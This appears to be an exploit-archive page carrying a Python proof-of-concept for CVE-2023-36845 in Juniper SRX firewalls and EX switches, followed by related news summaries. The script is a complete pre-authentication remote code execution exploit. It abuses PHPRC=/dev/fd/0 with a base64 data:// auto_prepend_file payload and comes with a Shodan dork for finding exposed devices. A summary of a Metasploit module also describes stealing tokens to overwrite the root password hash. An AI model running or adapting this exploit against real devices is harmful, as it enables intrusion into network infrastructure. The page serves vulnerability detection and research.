Headline
Juniper SRX Firewall / EX Switch Remote Code Execution
This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. It executes the phpinfo() function on the login page of the target device, allowing to inspect the PHP configuration. This script also has the option to save the phpinfo() output to a file for further analysis.
# ***************************************************************************************************# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)# Description:## This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.# It executes the phpinfo() function on the login page of the target device, # allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() # output to a file for further analysis.## Shodan Dork: http.favicon.hash:2141724739# Date: 2023/10/01# Exploit Author: whiteOwl ([email protected])# Vendor Homepage: https://whiteowl-pub.github.io# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,# 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.# 4R2-S1/R3,23.2R1-S1/R2# Tested on: JUNOS SM804122pri 15.1X49-D170.4# CVE : cve-2023-36845# ***************************************************************************************************import argparseimport requestsbanner = """************************************************************** CVE-2023-36845 Vulnerability Detector & Proof of concept ** This script checks for the CVE-2023-36845 vulnerability ** and run phpinfo() on vulnerable devices. ** If you suspect a vulnerable system, please take action ** immediately to secure it. ** ** Author: whiteowl **************************************************************"""def send_request(url, output_file=None, verbose=False): target_url = f"{url}/?PHPRC=/dev/fd/0" data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="' headers = { 'User-Agent': 'Mozilla/5.0', } try: response = requests.post(target_url, headers=headers, data=data, stream=True) if response.status_code == 200: print("The Target Device is Vulnerable to: CVE-2023-36845") else: print("Not Vulnerable: Status Code", response.status_code) if output_file: with open(output_file, 'w', encoding='utf-8') as file: file.write(response.text) if verbose: print(f"HTTP Status Code: {response.status_code}") print("Response Headers:") for header, value in response.headers.items(): print(f"{header}: {value}") print("Response Content:") print(response.text) except requests.exceptions.RequestException as e: print(f"An error occurred: {e}")def main(): print(banner) parser = argparse.ArgumentParser(description="Custom curl-like script") parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request") parser.add_argument("-o", "--output", help="Output file to save the HTML content") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode") args = parser.parse_args() send_request(args.url, args.output, args.verbose)if __name__ == "__main__": main()Related news
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August. The agency on Monday added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active
This Metasploit module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. The affected Juniper devices running FreeBSD and every FreeBSD process can access their stdin by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being auto_prepend_file which causes the provided file to be added using the require function. The second PHP function is allow_url_include which allows the use of URL-aware fopen wrappers. By enabling allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses data:// to provide a file inline which includes the base64 encoded PHP payload. By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a datastore option JAIL_BREAK, that when set to true, will steal the necessary tokens from a user authenticated to the J-Web application, in order to overwrite the root password hash. If ther...
New research has found that close to 12,000 internet-exposed Juniper firewall devices are vulnerable to a recently disclosed remote code execution flaw. VulnCheck, which discovered a new exploit for CVE-2023-36845, said it could be exploited by an "unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system." CVE-2023-36845 refers to a
Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports. The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth_operation.php endpoint," the same day a proof-of-concept (PoC)
Networking hardware company Juniper Networks has released an "out-of-cycle" security update to address multiple flaws in the J-Web component of Junos OS that could be combined to achieve remote code execution on susceptible installations. The four vulnerabilities have a cumulative CVSS rating of 9.8, making them Critical in severity. They affect all versions of Junos OS on SRX and EX Series. "By